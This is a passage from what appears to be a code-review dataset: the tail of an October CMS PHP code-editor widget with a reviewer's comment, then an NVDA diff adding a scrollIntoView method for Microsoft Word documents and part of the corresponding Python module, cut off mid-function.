$this->vars['showInvisibles'] = $this->showInvisibles; $this->vars['highlightActiveLine'] = $this->highlightActiveLine; $this->vars['useSoftTabs'] = $this->useSoftTabs; $this->vars['showGutter'] = $this->showGutter; $this->vars['language'] = $this->language; $this->vars['margin'] = $this->margin; $this->vars['stretch'] = $this->formField->stretch; $this->vars['size'] = $this->formField->size; $this->vars['readOnly'] = $this->readOnly; $this->vars['autocompletion'] = $this->autocompletion; $this->vars['enableSnippets'] = $this->enableSnippets; $this->vars['displayIndentGuides'] = $this->displayIndentGuides; $this->vars['showPrintMargin'] = $this->showPrintMargin; // Double encode when escaping $this->vars['value'] 
= htmlentities($this->getLoadValue(), ENT_QUOTES, 'UTF-8', true); $this->vars['name'] = $this->getFieldName(); } /** * @inheritDoc */ protected function loadAssets() { $this->addCss('css/codeeditor.css', 'core'); $this->addJs('js/build-min.js', 'core'); } /** * Looks at the user preferences and overrides any set values. * @return void */ protected function applyEditorPreferences() { // Load the editor system settings $preferences = BackendPreference::instance(); $this->fontSize = $preferences->editor_font_size; $this->wordWrap = $preferences->editor_word_wrap; $this->codeFolding = $preferences->editor_code_folding; $this->autoClosing = $preferences->editor_auto_closing; $this->tabSize = $preferences->editor_tab_size; $this->theme = $preferences->editor_theme; $this->showInvisibles = $preferences->editor_show_invisibles; $this->highlightActiveLine = $preferences->editor_highlight_active_line; $this->useSoftTabs = !$preferences->editor_use_hard_tabs; $this->showGutter = $preferences->editor_show_gutter; $this->autocompletion = $preferences->editor_autocompletion; $this->enableSnippets = $preferences->editor_enable_snippets; $this->displayIndentGuides = $preferences->editor_display_indent_guides; $this->showPrintMargin = $preferences->editor_show_print_margin; } }
1
17,406
This can't exist here either because the code editor can be used on other models than CMS templates. You could probably implement this as a `hint` property (so `hint: cms::lang.cms_object.safe_mode_enabled`) on the codeeditor formwidget instead though and I'd be fine with that.
octobercms-october
php
@@ -888,6 +888,15 @@ class WordDocumentTextInfo(textInfos.TextInfo): field['line-prefix']=mapPUAToUnicode.get(bullet,bullet) return field + def scrollIntoView(self): + try: + self.obj.WinwordWindowObject.ScrollIntoView(self._rangeObj, True) + except COMError: + log.exception("Can't scroll") + pass + + + def expand(self,unit): if unit==textInfos.UNIT_LINE: try:
1
# A part of NonVisual Desktop Access (NVDA) # Copyright (C) 2006-2020 NV Access Limited, Manish Agrawal, Derek Riemer, Babbage B.V. # This file is covered by the GNU General Public License. # See the file COPYING for more details. import ctypes import time from comtypes import COMError, GUID, BSTR import comtypes.client import comtypes.automation import uuid import operator import locale import collections import colorsys import eventHandler import braille from scriptHandler import script import languageHandler import ui import NVDAHelper import XMLFormatting from logHandler import log import winUser import oleacc import globalVars import speech import config import textInfos import textInfos.offsets import colors import controlTypes import treeInterceptorHandler import browseMode import review from cursorManager import CursorManager, ReviewCursorManager from tableUtils import HeaderCellInfo, HeaderCellTracker from . import Window from ..behaviors import EditableTextWithoutAutoSelectDetection from . 
import _msOfficeChart import locationHelper #Word constants #wdLineSpacing rules wdLineSpaceSingle=0 wdLineSpace1pt5=1 wdLineSpaceDouble=2 wdLineSpaceAtLeast=3 wdLineSpaceExactly=4 wdLineSpaceMultiple=5 # wdMeasurementUnits wdInches=0 wdCentimeters=1 wdMillimeters=2 wdPoints=3 wdPicas=4 wdCollapseEnd=0 wdCollapseStart=1 #Indexing wdActiveEndAdjustedPageNumber=1 wdActiveEndPageNumber=3 wdNumberOfPagesInDocument=4 wdHorizontalPositionRelativeToPage=5 wdVerticalPositionRelativeToPage=6 wdFirstCharacterLineNumber=10 wdWithInTable=12 wdStartOfRangeRowNumber=13 wdMaximumNumberOfRows=15 wdStartOfRangeColumnNumber=16 wdMaximumNumberOfColumns=18 #Horizontal alignment wdAlignParagraphLeft=0 wdAlignParagraphCenter=1 wdAlignParagraphRight=2 wdAlignParagraphJustify=3 #Units wdCharacter=1 wdWord=2 wdSentence=3 wdParagraph=4 wdLine=5 wdStory=6 wdColumn=9 wdRow=10 wdWindow=11 wdCell=12 wdCharFormat=13 wdParaFormat=14 wdTable=15 #GoTo - direction wdGoToAbsolute=1 wdGoToRelative=2 wdGoToNext=2 wdGoToPrevious=3 #GoTo - units wdGoToBookmark=-1 wdGoToSection=0 wdGoToPage=1 wdGoToTable=2 wdGoToLine=3 wdGoToFootnote=4 wdGoToEndnote=5 wdGoToComment=6 wdGoToField=7 wdGoToGraphic=8 wdGoToObject=9 wdGoToEquation=10 wdGoToHeading=11 wdGoToPercent=12 wdGoToSpellingError=13 wdGoToGrammaticalError=14 wdGoToProofreadingError=15 wdCommentsStory=4 wdEndnotesStory=3 wdEvenPagesFooterStory=8 wdEvenPagesHeaderStory=6 wdFirstPageFooterStory=11 wdFirstPageHeaderStory=10 wdFootnotesStory=2 wdMainTextStory=1 wdPrimaryFooterStory=9 wdPrimaryHeaderStory=7 wdTextFrameStory=5 wdFieldFormTextInput=70 wdFieldFormCheckBox=71 wdFieldFormDropDown=83 wdContentControlRichText=0 wdContentControlText=1 wdContentControlPicture=2 wdContentControlComboBox=3 wdContentControlDropdownList=4 wdContentControlBuildingBlockGallery=5 wdContentControlDate=6 wdContentControlGroup=7 wdContentControlCheckBox=8 wdInlineShapeChart=12 wdNoRevision=0 wdRevisionInsert=1 wdRevisionDelete=2 wdRevisionProperty=3 wdRevisionParagraphNumber=4 
wdRevisionDisplayField=5 wdRevisionReconcile=6 wdRevisionConflict=7 wdRevisionStyle=8 wdRevisionReplace=9 wdRevisionParagraphProperty=10 wdRevisionTableProperty=11 wdRevisionSectionProperty=12 wdRevisionStyleDefinition=13 wdRevisionMovedFrom=14 wdRevisionMovedTo=15 wdRevisionCellInsertion=16 wdRevisionCellDeletion=17 wdRevisionCellMerge=18 # MsoThemeColorSchemeIndex msoThemeAccent1=5 msoThemeAccent2=6 msoThemeAccent3=7 msoThemeAccent4=8 msoThemeAccent5=9 msoThemeAccent6=10 msoThemeDark1=1 msoThemeDark2=3 msoThemeFollowedHyperlink=12 msoThemeHyperlink=11 msoThemeLight1=2 msoThemeLight2=4 # WdThemeColorIndex wdNotThemeColor=-1 wdThemeColorAccent1=4 wdThemeColorAccent2=5 wdThemeColorAccent3=6 wdThemeColorAccent4=7 wdThemeColorAccent5=8 wdThemeColorAccent6=9 wdThemeColorBackground1=12 wdThemeColorBackground2=14 wdThemeColorHyperlink=10 wdThemeColorHyperlinkFollowed=11 wdThemeColorMainDark1=0 wdThemeColorMainDark2=2 wdThemeColorMainLight1=1 wdThemeColorMainLight2=3 wdThemeColorText1=13 wdThemeColorText2=15 # Word Field types FIELD_TYPE_REF = 3 # cross reference field FIELD_TYPE_HYPERLINK = 88 # hyperlink field # Mapping from http://www.wordarticles.com/Articles/Colours/2007.php#UIConsiderations WdThemeColorIndexToMsoThemeColorSchemeIndex={ wdThemeColorMainDark1:msoThemeDark1, wdThemeColorMainLight1:msoThemeLight1, wdThemeColorMainDark2:msoThemeDark2, wdThemeColorMainLight2:msoThemeLight2, wdThemeColorAccent1:msoThemeAccent1, wdThemeColorAccent2:msoThemeAccent2, wdThemeColorAccent3:msoThemeAccent3, wdThemeColorAccent4:msoThemeAccent4, wdThemeColorAccent5:msoThemeAccent5, wdThemeColorAccent6:msoThemeAccent6, wdThemeColorHyperlink:msoThemeHyperlink, wdThemeColorHyperlinkFollowed:msoThemeFollowedHyperlink, wdThemeColorBackground1:msoThemeLight1, wdThemeColorText1:msoThemeDark1, wdThemeColorBackground2:msoThemeLight2, wdThemeColorText2:msoThemeDark2, } wdRevisionTypeLabels={ # Translators: a Microsoft Word revision type (inserted content) wdRevisionInsert:_("insertion"), # 
Translators: a Microsoft Word revision type (deleted content) wdRevisionDelete:_("deletion"), # Translators: a Microsoft Word revision type (changed content property, e.g. font, color) wdRevisionProperty:_("property"), # Translators: a Microsoft Word revision type (changed paragraph number) wdRevisionParagraphNumber:_("paragraph number"), # Translators: a Microsoft Word revision type (display field) wdRevisionDisplayField:_("display field"), # Translators: a Microsoft Word revision type (reconcile) wdRevisionReconcile:_("reconcile"), # Translators: a Microsoft Word revision type (conflicting revision) wdRevisionConflict:_("conflict"), # Translators: a Microsoft Word revision type (style change) wdRevisionStyle:_("style"), # Translators: a Microsoft Word revision type (replaced content) wdRevisionReplace:_("replace"), # Translators: a Microsoft Word revision type (changed paragraph property, e.g. alignment) wdRevisionParagraphProperty:_("paragraph property"), # Translators: a Microsoft Word revision type (table) wdRevisionTableProperty:_("table property"), # Translators: a Microsoft Word revision type (section property) wdRevisionSectionProperty:_("section property"), # Translators: a Microsoft Word revision type (style definition) wdRevisionStyleDefinition:_("style definition"), # Translators: a Microsoft Word revision type (moved from) wdRevisionMovedFrom:_("moved from"), # Translators: a Microsoft Word revision type (moved to) wdRevisionMovedTo:_("moved to"), # Translators: a Microsoft Word revision type (inserted table cell) wdRevisionCellInsertion:_("cell insertion"), # Translators: a Microsoft Word revision type (deleted table cell) wdRevisionCellDeletion:_("cell deletion"), # Translators: a Microsoft Word revision type (merged table cells) wdRevisionCellMerge:_("cell merge"), } storyTypeLocalizedLabels={ wdCommentsStory:_("Comments"), wdEndnotesStory:_("Endnotes"), wdEvenPagesFooterStory:_("Even pages footer"), wdEvenPagesHeaderStory:_("Even pages header"), 
wdFirstPageFooterStory:_("First page footer"), wdFirstPageHeaderStory:_("First page header"), wdFootnotesStory:_("Footnotes"), wdPrimaryFooterStory:_("Primary footer"), wdPrimaryHeaderStory:_("Primary header"), wdTextFrameStory:_("Text frame"), } wdFieldTypesToNVDARoles={ wdFieldFormTextInput:controlTypes.Role.EDITABLETEXT, wdFieldFormCheckBox:controlTypes.Role.CHECKBOX, wdFieldFormDropDown:controlTypes.Role.COMBOBOX, } wdContentControlTypesToNVDARoles={ wdContentControlRichText:controlTypes.Role.EDITABLETEXT, wdContentControlText:controlTypes.Role.EDITABLETEXT, wdContentControlPicture:controlTypes.Role.GRAPHIC, wdContentControlComboBox:controlTypes.Role.COMBOBOX, wdContentControlDropdownList:controlTypes.Role.COMBOBOX, wdContentControlDate:controlTypes.Role.EDITABLETEXT, wdContentControlGroup:controlTypes.Role.GROUPING, wdContentControlCheckBox:controlTypes.Role.CHECKBOX, } winwordWindowIid=GUID('{00020962-0000-0000-C000-000000000046}') wm_winword_expandToLine=ctypes.windll.user32.RegisterWindowMessageW(u"wm_winword_expandToLine") NVDAUnitsToWordUnits={ textInfos.UNIT_CHARACTER:wdCharacter, textInfos.UNIT_WORD:wdWord, textInfos.UNIT_LINE:wdLine, textInfos.UNIT_SENTENCE:wdSentence, textInfos.UNIT_PARAGRAPH:wdParagraph, textInfos.UNIT_TABLE:wdTable, textInfos.UNIT_CELL:wdCell, textInfos.UNIT_ROW:wdRow, textInfos.UNIT_COLUMN:wdColumn, textInfos.UNIT_STORY:wdStory, textInfos.UNIT_READINGCHUNK:wdSentence, } formatConfigFlagsMap = { "reportFontName": 0x1, "reportFontSize": 0x2, "reportFontAttributes": 0x4, "reportColor": 0x8, "reportAlignment": 0x10, "reportStyle": 0x20, "reportSpellingErrors": 0x40, "reportPage": 0x80, "reportLineNumber": 0x100, "reportTables": 0x200, "reportLists": 0x400, "reportLinks": 0x800, "reportComments": 0x1000, "reportHeadings": 0x2000, "autoLanguageSwitching": 0x4000, "reportRevisions": 0x8000, "reportParagraphIndentation": 0x10000, "reportLineSpacing": 0x40000, "reportSuperscriptsAndSubscripts": 0x80000, "reportGraphics": 0x100000, } 
formatConfigFlag_includeLayoutTables = 0x20000 # Map some characters from 0 to Unicode. Meant to be used with bullets only. # Doesn't care about the actual font, so can give incorrect Unicode in rare cases. mapPUAToUnicode = { # from : to # fontname u'\uF06E': u'\u25A0', # Wingdings (black square) u'\uF076': u'\u2756', # Wingdings (black diamond minus white x u'\uF0A7': u'\u25AA', # Symbol (black small square) u'\uF0A8': u'\u2666', # Symbol (black diamond suit) u'\uF0B7': u'\u2022', # Symbol (bullet) u'\uF0D8': u'\u2B9A', # Wingdings (three-D top-lighted RIGHTWARDS equilateral arrowhead) u'\uF0E8': u'\U0001f87a', # Wingdings (wide-headed rightwards heavy barb arrow) u'\uF0F0': u'\u21E8', # Wingdings (right white arrow) u'\uF0FC': u'\u2714', # Wingdings (heavy check mark) } class WordDocumentHeadingQuickNavItem(browseMode.TextInfoQuickNavItem): def __init__(self,nodeType,document,textInfo,level): self.level=level super(WordDocumentHeadingQuickNavItem,self).__init__(nodeType,document,textInfo) def isChild(self,parent): if not isinstance(parent,WordDocumentHeadingQuickNavItem): return False return self.level>parent.level class WordDocumentCollectionQuickNavItem(browseMode.TextInfoQuickNavItem): """ A QuickNavItem representing an item that MS Word stores as a collection (e.g. link, table etc). """ def rangeFromCollectionItem(self,item): """ Fetches a Microsoft Word range object from a Microsoft Word item in a collection. E.g. a HyperLink object. @param item: an item from a collection (E.g. a HyperLink object). """ return item.range def __init__(self,itemType,document,collectionItem): """ See L{TextInfoQuickNavItem} for itemType and document argument definitions. @param collectionItem: an item from an MS Word collection e.g. HyperLink object. 
""" self.collectionItem=collectionItem self.rangeObj=self.rangeFromCollectionItem(collectionItem) textInfo=BrowseModeWordDocumentTextInfo(document,None,_rangeObj=self.rangeObj) super(WordDocumentCollectionQuickNavItem,self).__init__(itemType,document,textInfo) class WordDocumentCommentQuickNavItem(WordDocumentCollectionQuickNavItem): @property def label(self): author=self.collectionItem.author date=self.collectionItem.date text=self.collectionItem.range.text # Translators: The label shown for a comment in the NVDA Elements List dialog in Microsoft Word. # {text}, {author} and {date} will be replaced by the corresponding details about the comment. return _(u"comment: {text} by {author} on {date}").format(author=author,text=text,date=date) def rangeFromCollectionItem(self,item): return item.scope class WordDocumentFieldQuickNavItem(WordDocumentCollectionQuickNavItem): def rangeFromCollectionItem(self,item): return item.result class WordDocumentRevisionQuickNavItem(WordDocumentCollectionQuickNavItem): @property def label(self): revisionType=wdRevisionTypeLabels.get(self.collectionItem.type) author=self.collectionItem.author or "" date=self.collectionItem.date description=self.collectionItem.formatDescription or "" text=(self.collectionItem.range.text or "")[:100] # Translators: The label shown for an editor revision (tracked change) in the NVDA Elements List dialog in Microsoft Word. # {revisionType} will be replaced with the type of revision; e.g. insertion, deletion or property. # {description} will be replaced with a description of the formatting changes, if any. # {text}, {author} and {date} will be replaced by the corresponding details about the revision. 
return _(u"{revisionType} {description}: {text} by {author} on {date}").format(revisionType=revisionType,author=author,text=text,date=date,description=description) class WordDocumentChartQuickNavItem(WordDocumentCollectionQuickNavItem): @property def label(self): text="" if self.collectionItem.Chart.HasTitle: text=self.collectionItem.Chart.ChartTitle.Text else: text=self.collectionItem.Chart.Name return u"{text}".format(text=text) def moveTo(self): chartNVDAObj = _msOfficeChart.OfficeChart(windowHandle= self.document.rootNVDAObject.windowHandle, officeApplicationObject=self.rangeObj.Document.Application, officeChartObject=self.collectionItem.Chart , initialDocument = self.document.rootNVDAObject ) eventHandler.queueEvent("gainFocus",chartNVDAObj) class WordDocumentSpellingErrorQuickNavItem(WordDocumentCollectionQuickNavItem): def rangeFromCollectionItem(self,item): return item @property def label(self): text=self.collectionItem.text # Translators: The label shown for a spelling error in the NVDA Elements List dialog in Microsoft Word. # {text} will be replaced with the text of the spelling error. return _(u"spelling: {text}").format(text=text) class WinWordCollectionQuicknavIterator(object): """ Allows iterating over an MS Word collection (e.g. HyperLinks) emitting L{QuickNavItem} objects. """ quickNavItemClass=WordDocumentCollectionQuickNavItem #: the QuickNavItem class that should be instanciated and emitted. def __init__(self,itemType,document,direction,rangeObj,includeCurrent): """ See L{QuickNavItemIterator} for itemType, document and direction definitions. @param rangeObj: a Microsoft Word range object where the collection should be fetched from. @param includeCurrent: if true then any item at the initial position will be also emitted rather than just further ones. 
""" self.document=document self.itemType=itemType self.direction=direction if direction else "next" self.rangeObj=rangeObj self.includeCurrent=includeCurrent def collectionFromRange(self,rangeObj): """ Fetches a Microsoft Word collection object from a Microsoft Word range object. E.g. HyperLinks from a range. @param rangeObj: a Microsoft Word range object. @return: a Microsoft Word collection object. """ raise NotImplementedError def filter(self,item): """ Only allows certain items fom a collection to be emitted. E.g. a table who's borders are enabled. @param item: an item from a Microsoft Word collection (e.g. HyperLink object). @return True if this item should be allowd, false otherwise. @rtype: bool """ return True def iterate(self): """ returns a generator that emits L{QuickNavItem} objects for this collection. """ if self.direction=="next": self.rangeObj.moveEnd(wdStory,1) elif self.direction=="previous": self.rangeObj.collapse(wdCollapseStart) self.rangeObj.moveStart(wdStory,-1) items=self.collectionFromRange(self.rangeObj) itemCount=items.count isFirst=True for index in range(1,itemCount+1): if self.direction=="previous": index=itemCount-(index-1) collectionItem=items[index] try: item=self.quickNavItemClass(self.itemType,self.document,collectionItem) except COMError: message = ("Error iterating over item with " "type: {type}, iteration direction: {dir}, total item count: {count}, item at index: {index}" "\nThis could be caused by an issue with some element within or a corruption of the word document." ).format(type=self.itemType, dir=self.direction, count=itemCount, index=index) log.debugWarning(message ,exc_info=True) continue itemRange=item.rangeObj # Skip over the item we're already on. 
if not self.includeCurrent and isFirst and ((self.direction=="next" and itemRange.start<=self.rangeObj.start) or (self.direction=="previous" and itemRange.end>self.rangeObj.end)): continue if not self.filter(collectionItem): continue yield item isFirst=False class LinkWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): quickNavItemClass=WordDocumentFieldQuickNavItem def collectionFromRange(self,rangeObj): return rangeObj.fields def filter(self, item): t = item.type if t == FIELD_TYPE_REF: fieldText = item.code.text.strip().split(' ') # ensure that the text has a \\h in it return any( fieldText[i] == '\\h' for i in range(2, len(fieldText)) ) return t == FIELD_TYPE_HYPERLINK class CommentWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): quickNavItemClass=WordDocumentCommentQuickNavItem def collectionFromRange(self,rangeObj): return rangeObj.comments class RevisionWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): quickNavItemClass=WordDocumentRevisionQuickNavItem def collectionFromRange(self,rangeObj): return rangeObj.revisions class SpellingErrorWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): quickNavItemClass=WordDocumentSpellingErrorQuickNavItem def collectionFromRange(self,rangeObj): return rangeObj.spellingErrors class GraphicWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): def collectionFromRange(self,rangeObj): return rangeObj.inlineShapes def filter(self,item): return 2<item.type<5 class TableWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): def collectionFromRange(self,rangeObj): return rangeObj.tables def filter(self,item): return config.conf["documentFormatting"]["includeLayoutTables"] or item.borders.enable class ChartWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): quickNavItemClass=WordDocumentChartQuickNavItem def collectionFromRange(self,rangeObj): return rangeObj.inlineShapes def filter(self,item): return 
item.type==wdInlineShapeChart class LazyControlField_RowAndColumnHeaderText(textInfos.ControlField): def __init__(self, ti): self._ti = ti super().__init__() def get(self, name, default=None): if name == "table-rowheadertext": try: cell = self._ti._rangeObj.cells[1] except IndexError: log.debugWarning("no cells for table row, possibly on end of cell mark") return super().get(name, default) return self._ti.obj.fetchAssociatedHeaderCellText(cell, False) elif name == "table-columnheadertext": try: cell = self._ti._rangeObj.cells[1] except IndexError: log.debugWarning("no cells for table row, possibly on end of cell mark") return super().get(name, default) return self._ti.obj.fetchAssociatedHeaderCellText(cell, True) else: return super().get(name, default) class WordDocumentTextInfo(textInfos.TextInfo): # #4852: temporary fix. # force mouse reading chunk to sentense to make it what it used to be in 2014.4. # We need to however fix line so it does not accidentially scroll. def _get_unit_mouseChunk(self): unit=super(WordDocumentTextInfo,self).unit_mouseChunk if unit==textInfos.UNIT_LINE: unit=textInfos.UNIT_SENTENCE return unit def _get_locationText(self): textList=[] # #8994: MS Word can only give accurate distances (taking paragraph indenting into account) when directly querying the selection. 
r=self._rangeObj s=self.obj.WinwordSelectionObject if s.isEqual(r): r=s else: return super(WordDocumentTextInfo,self).locationText offset=r.information(wdHorizontalPositionRelativeToPage) distance=self.obj.getLocalizedMeasurementTextForPointSize(offset) # Translators: a distance from the left edge of the page in Microsoft Word textList.append(_("{distance} from left edge of page").format(distance=distance)) offset=r.information(wdVerticalPositionRelativeToPage) distance=self.obj.getLocalizedMeasurementTextForPointSize(offset) # Translators: a distance from the left edge of the page in Microsoft Word textList.append(_("{distance} from top edge of page").format(distance=distance)) return ", ".join(textList) def copyToClipboard(self, notify): self._rangeObj.copy() if notify: ui.reportTextCopiedToClipboard(self.text) return True def find(self,text,caseSensitive=False,reverse=False): f=self._rangeObj.find f.text=text f.matchCase=caseSensitive f.forward=not reverse return f.execute() shouldIncludeLayoutTables=True #: layout tables should always be included (no matter the user's browse mode setting). def activate(self): import mathPres mathMl=mathPres.getMathMlFromTextInfo(self) if mathMl: return mathPres.interactWithMathMl(mathMl) newRng=self._rangeObj.Duplicate newRng.End=newRng.End+1 if newRng.InlineShapes.Count >= 1: if newRng.InlineShapes[1].Type==wdInlineShapeChart: return eventHandler.queueEvent('gainFocus',_msOfficeChart.OfficeChart(windowHandle= self.obj.windowHandle, officeApplicationObject=self.obj.WinwordDocumentObject.Application, officeChartObject=newRng.InlineShapes[1].Chart , initialDocument = self.obj )) # Handle activating links. # It is necessary to expand to word to get a link as the link's first character is never actually in the link! 
tempRange=self._rangeObj.duplicate tempRange.expand(wdWord) links=tempRange.hyperlinks if links.count>0: links[1].follow() return tempRange.expand(wdParagraph) fields=tempRange.fields for field in (fields.item(i) for i in range(1, fields.count+1)): if field.type != FIELD_TYPE_REF: continue fResult = field.result fResult.moveStart(wdCharacter,-1) # move back one visible character (passed the hidden text eg the code for the reference). fResStart = fResult.start +1 # don't include the character before the hidden text. fResEnd = fResult.end rObjStart = self._rangeObj.start rObjEnd = self._rangeObj.end # check to see if the _rangeObj is inside the fResult range if not (fResStart <= rObjStart and fResEnd >= rObjEnd): continue # text will be something like ' REF _Ref457210120 \\h ' fieldText = field.code.text.strip().split(' ') # the \\h field indicates that the field is a link if not any( fieldText[i] == '\\h' for i in range(2, len(fieldText)) ): log.debugWarning("no \\h for field xref: %s" % field.code.text) continue bookmarkKey = fieldText[1] # we want the _Ref12345 part # get book mark start, we need to look at the whole document to find the bookmark. 
tempRange.Expand(wdStory) bMark = tempRange.bookmarks(bookmarkKey) self._rangeObj.setRange(bMark.start, bMark.start) self.updateCaret() tiCopy = self.copy() tiCopy.expand(textInfos.UNIT_LINE) speech.speakTextInfo(tiCopy, reason=controlTypes.OutputReason.FOCUS) braille.handler.handleCaretMove(self) return def _expandToLineAtCaret(self): lineStart=ctypes.c_int() lineEnd=ctypes.c_int() res=NVDAHelper.localLib.nvdaInProcUtils_winword_expandToLine(self.obj.appModule.helperLocalBindingHandle,self.obj.documentWindowHandle,self._rangeObj.start,ctypes.byref(lineStart),ctypes.byref(lineEnd)) if res!=0 or lineStart.value==lineEnd.value or lineStart.value==-1 or lineEnd.value==-1: log.debugWarning("winword_expandToLine failed") self._rangeObj.expand(wdParagraph) return self._rangeObj.setRange(lineStart.value,lineEnd.value) def __init__(self,obj,position,_rangeObj=None): super(WordDocumentTextInfo,self).__init__(obj,position) if _rangeObj: self._rangeObj=_rangeObj.Duplicate return if isinstance(position, locationHelper.Point): try: self._rangeObj=self.obj.WinwordDocumentObject.activeWindow.RangeFromPoint(position.x,position.y) except COMError: raise NotImplementedError elif position==textInfos.POSITION_SELECTION: self._rangeObj=self.obj.WinwordSelectionObject.range elif position==textInfos.POSITION_CARET: self._rangeObj=self.obj.WinwordSelectionObject.range self._rangeObj.Collapse() elif position==textInfos.POSITION_ALL: self._rangeObj=self.obj.WinwordSelectionObject.range self._rangeObj.Expand(wdStory) elif position==textInfos.POSITION_FIRST: self._rangeObj=self.obj.WinwordSelectionObject.range self._rangeObj.SetRange(0,0) elif position==textInfos.POSITION_LAST: self._rangeObj=self.obj.WinwordSelectionObject.range self._rangeObj.endOf(wdStory) self._rangeObj.move(wdCharacter,-1) elif isinstance(position,textInfos.offsets.Offsets): self._rangeObj=self.obj.WinwordSelectionObject.range self._rangeObj.SetRange(position.startOffset,position.endOffset) elif 
isinstance(position,WordDocumentTextInfo): # copying from one textInfo to another self._rangeObj=position._rangeObj.duplicate else: raise NotImplementedError("position: %s"%position) def getTextWithFields(self,formatConfig=None): if self.isCollapsed: return [] if self.obj.ignoreFormatting: return [self.text] extraDetail=formatConfig.get('extraDetail',False) if formatConfig else False if not formatConfig: formatConfig=config.conf['documentFormatting'] formatConfig['autoLanguageSwitching']=config.conf['speech'].get('autoLanguageSwitching',False) startOffset=self._rangeObj.start endOffset=self._rangeObj.end text=BSTR() # #9067: format config flags map is a dictionary. formatConfigFlags=sum(y for x,y in formatConfigFlagsMap.items() if formatConfig.get(x,False)) if self.shouldIncludeLayoutTables: formatConfigFlags+=formatConfigFlag_includeLayoutTables if self.obj.ignoreEditorRevisions: formatConfigFlags&=~formatConfigFlagsMap['reportRevisions'] if self.obj.ignorePageNumbers: formatConfigFlags&=~formatConfigFlagsMap['reportPage'] res=NVDAHelper.localLib.nvdaInProcUtils_winword_getTextInRange(self.obj.appModule.helperLocalBindingHandle,self.obj.documentWindowHandle,startOffset,endOffset,formatConfigFlags,ctypes.byref(text)) if res or not text: log.debugWarning("winword_getTextInRange failed with %d"%res) return [self.text] commandList=XMLFormatting.XMLTextParser().parse(text.value) for index,item in enumerate(commandList): if isinstance(item,textInfos.FieldCommand): field=item.field if isinstance(field,textInfos.ControlField): item.field=self._normalizeControlField(field) elif isinstance(field,textInfos.FormatField): item.field=self._normalizeFormatField(field,extraDetail=extraDetail) elif index>0 and isinstance(item,str) and item.isspace(): #2047: don't expose language for whitespace as its incorrect for east-asian languages lastItem=commandList[index-1] if isinstance(lastItem,textInfos.FieldCommand) and isinstance(lastItem.field,textInfos.FormatField): try: del 
lastItem.field['language'] except KeyError: pass return commandList def _normalizeControlField(self,field): role=field.pop('role',None) if role=="heading": role=controlTypes.Role.HEADING elif role=="table": role=controlTypes.Role.TABLE field['table-rowcount']=int(field.get('table-rowcount',0)) field['table-columncount']=int(field.get('table-columncount',0)) elif role=="tableCell": role=controlTypes.Role.TABLECELL field['table-rownumber']=int(field.get('table-rownumber',0)) field['table-columnnumber']=int(field.get('table-columnnumber',0)) elif role=="footnote": role=controlTypes.Role.FOOTNOTE elif role=="endnote": role=controlTypes.Role.ENDNOTE elif role=="graphic": role=controlTypes.Role.GRAPHIC elif role=="chart": role=controlTypes.Role.CHART elif role=="object": progid=field.get("progid") if progid and progid.startswith("Equation.DSMT"): # MathType. role=controlTypes.Role.MATH else: role=controlTypes.Role.EMBEDDEDOBJECT else: fieldType=int(field.pop('wdFieldType',-1)) if fieldType!=-1: role=wdFieldTypesToNVDARoles.get(fieldType,controlTypes.Role.UNKNOWN) if fieldType==wdFieldFormCheckBox and int(field.get('wdFieldResult','0'))>0: field['states']=set([controlTypes.State.CHECKED]) elif fieldType==wdFieldFormDropDown: field['value']=field.get('wdFieldResult',None) fieldStatusText=field.pop('wdFieldStatusText',None) if fieldStatusText: field['name']=fieldStatusText field['alwaysReportName']=True else: fieldType=int(field.get('wdContentControlType',-1)) if fieldType!=-1: role=wdContentControlTypesToNVDARoles.get(fieldType,controlTypes.Role.UNKNOWN) if role==controlTypes.Role.CHECKBOX: fieldChecked=bool(int(field.get('wdContentControlChecked','0'))) if fieldChecked: field['states']=set([controlTypes.State.CHECKED]) fieldTitle=field.get('wdContentControlTitle',None) if fieldTitle: field['name']=fieldTitle field['alwaysReportName']=True if role is not None: field['role']=role if role==controlTypes.Role.TABLE and field.get('longdescription'): 
field['states']=set([controlTypes.State.HASLONGDESC]) storyType=int(field.pop('wdStoryType',0)) if storyType: name=storyTypeLocalizedLabels.get(storyType,None) if name: field['name']=name field['alwaysReportName']=True field['role']=controlTypes.Role.FRAME newField = LazyControlField_RowAndColumnHeaderText(self) newField.update(field) return newField def _normalizeFormatField(self,field,extraDetail=False): _startOffset=int(field.pop('_startOffset')) _endOffset=int(field.pop('_endOffset')) lineSpacingRule=field.pop('wdLineSpacingRule',None) lineSpacingVal=field.pop('wdLineSpacing',None) if lineSpacingRule is not None: lineSpacingRule=int(lineSpacingRule) if lineSpacingRule==wdLineSpaceSingle: # Translators: single line spacing field['line-spacing']=pgettext('line spacing value',"single") elif lineSpacingRule==wdLineSpaceDouble: # Translators: double line spacing field['line-spacing']=pgettext('line spacing value',"double") elif lineSpacingRule==wdLineSpace1pt5: # Translators: line spacing of 1.5 lines field['line-spacing']=pgettext('line spacing value',"1.5 lines") elif lineSpacingRule==wdLineSpaceExactly: field['line-spacing'] = pgettext( 'line spacing value', # Translators: line spacing of exactly x point "exactly {space:.1f} pt" ).format(space=float(lineSpacingVal)) elif lineSpacingRule==wdLineSpaceAtLeast: # Translators: line spacing of at least x point field['line-spacing']=pgettext('line spacing value',"at least %.1f pt")%float(lineSpacingVal) elif lineSpacingRule==wdLineSpaceMultiple: # Translators: line spacing of x lines field['line-spacing']=pgettext('line spacing value',"%.1f lines")%(float(lineSpacingVal)/12.0) revisionType=int(field.pop('wdRevisionType',0)) if revisionType==wdRevisionInsert: field['revision-insertion']=True elif revisionType==wdRevisionDelete: field['revision-deletion']=True elif revisionType: revisionLabel=wdRevisionTypeLabels.get(revisionType,None) if revisionLabel: field['revision']=revisionLabel color=field.pop('color',None) if 
